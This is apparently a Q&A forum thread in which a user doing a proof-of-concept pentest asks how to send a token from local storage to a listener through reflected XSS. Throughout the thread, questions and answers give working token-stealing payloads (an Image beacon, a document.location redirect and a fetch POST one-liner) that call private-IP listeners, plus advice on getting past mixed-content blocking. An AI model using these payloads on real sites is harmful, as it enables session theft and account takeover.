# how to send cookies or token in local storage to a remote server using reflected XSS

Tags: javascript, cookies, token, reflected-xss, local-storage

I have an XSS vulnerability identified by `<script>alert(1);</script>` in the url.
So when I put it in the url it gets executed (ex: `www.example.com/admin/<script>alert(1);</script>` ).

I also tried after loggin in, and noticed the token is being saved in local storage, so I was able to print it using this script: `www.example.com/admin/<script>alert(localStorage.getItem("key"))</script>`

Now I want to go further and see how this token, that I was able to print, to send it to a remote server.

I found this quick tutorial: https://pswalia2u.medium.com/exploiting-xss-stealing-cookies-csrf-2325ec03136e, and I tired to do the classic way which seems simple and starigh forward.
On kali I launched an http server listening on port 8080.
And on my host which has ping to kali, I opened the browser and I put in the url the script, but I adjusted it to get the token instead of cookie (because in my case I want to token which is saved in local storage)

This is the script I adjusted:

```
<script>var i=new Image(); i.src="http://10.0.2.15:8080/?token="+btoa(localStorage.getItem("key"));</script>
```

so the final link will be:

```
www.example.com/admin/<script>var i=new Image(); i.src="http://10.0.2.15:8080/?token="+btoa(localStorage.getItem("key"));</script>
```

when running this I dont receive anything on the kali server listening on port 8080, am I missing anything ?

Comment: is that script is run, it is only creating an Image object/element.  It is not inserted into the DOM so the src never gets hit?

Comment: the script alert(1), is run, so why the other script wont run?

Comment: it may have run... but the browser doesn't send a request to the src because the image element has not been appended/added to the DOM.

Comment: I didn't quite get your point? my knowledge is not that much in html, what do you mean by the image element has not beed added to the DOM?
To not that when I fire the url in thr browser I get the below(for alert 1 its the same but it gets triggered):


`<body>{,"message":"Error","cause":["Unable to reach: admin/" `

`<script>var i=new Image(); i.src="http:/192.168.0.102:8080;</script>`

`"]}`

`</body>`

Comment: Update:

I used this script and it worked for me:
<script%20type="text/javascript">document.location="http://192.168.0.102:8080/?c="+localStorage.getItem("token");</script>

I got it from this tutorial: https://medium.com/@laur.telliskivi/pentesting-basics-cookie-grabber-xss-8b672e4738b2

Comment: there ya go, that'll change the browser's location bar and it will navigate to that URL.

Comment: @browsermator yes true, I had to click on "Enter" again when it navigates the url. An idea how to make this request without clicking the Enter button?

Comment: maybe use location.append(url) instead... or location.href = url.

Comment: @browsermator where to use that ? can you please write me the full xss script?

Comment: To be as helpful as I can, I'll suggest that you learn javascript.

Answer (score 1):

Do you understand *how / why* the approach with the `Image` is supposed to work? You're effectively creating an HTML `<img src=...>` tag, where the source is a URL starting with your listener and ending with your token.

However, you left out a critical part: you didn't actually create the image tag! You created an object that, *IF* you added it to the document, would be an image tag. But you never added it! The browser does not render HTML elements that are not part of the DOM (Document Object Model, the data structure that represents the parsed HTML on the page. To make your HTML element do something, you need to add it to the DOM. Walking you through DOM manipulation functions and other options for creating HTML from JS is outside the scope of this site but they're easy to find.

You could also make the request directly from JS, rather than creating an HTML element and adding it to the DOM. Both the XMLHttpRequest and Fetch APIs can be used to create web requests using JS alone. You can use those to call your listener, either with the token in the URL (as you're trying to do with the `Image`) or using a `POST` request and submitting the token in the body.

Comment: How to doa  post request in XSS ? I did a quick search I couldn't find a one line code to do that? in my case the XSS is in the url, so I want to write a one line code that grabs my token and sends it to my listener.

Comment: See https://developer.mozilla.org/en-US/docs/Web/API/Fetch_API/Using_Fetch but a one-liner might be `fetch('http://10.0.2.15:8080/post_token',{method:'POST',body:localStorage.getItem("key")})` or similar (adjust URL, optionally add headers, optionally encode body, etc.)

Comment: When trying your script I am getting this error:

script>:1 Mixed Content: The page at 'https://myserver:15000/admin/%3Cscript%20type=%22text/javascript%22%3Efetch('http://192.168.0.102:8080/%3fcookie='%20+%20encodeURIComponent(localStorage.getItem(%22token%22)),%20%7Bmethod:%20'GET'%7D);%3C/script%3E' was loaded over HTTPS, but requested an insecure resource 'http://192.168.0.102:8080/?cookie=test'. This request has been blocked; the content must be served over HTTPS.

Any idea ?

Comment: Obvious solution is to make the fetch request (and listener) use HTTPS? I did say you'd need to adjust the URL. You could also make the vulnerable site _not_ use HTTPS. On older browsers you could easily enable "mixed content" but in general that's blocked by default now, though you might be able to set a flag to enable it again if you don't mind weakening your own browser's security just to make your tests easier.

Comment: ah okay, but any idea how the other script works.
`<script%20type="text/javascript">document.location="192.168.0.102:8080/…>`
Noting that after inserting this script I am redirected to my http server and I have to click enter on the redirected url to receive the cookie (I know that's a stupid poc :D )

Comment: Navigation requests - as opposed to resource requests (like the image tag) or script-initiated request (like the `fetch` API) - don't have mixed content restrictions, because the content isn't mixed; the existing page is thrown away entirely when the navigation happens (rather than the request being made within the existing page's context) and the actual page (URL in the top bar, and all) changes. This is usually very obvious to the user, so it's undesirable for a real attack. Setting `location` using JS is mostly equivalent to clicking a link.

Comment: so any other workaround to do this poc ? :/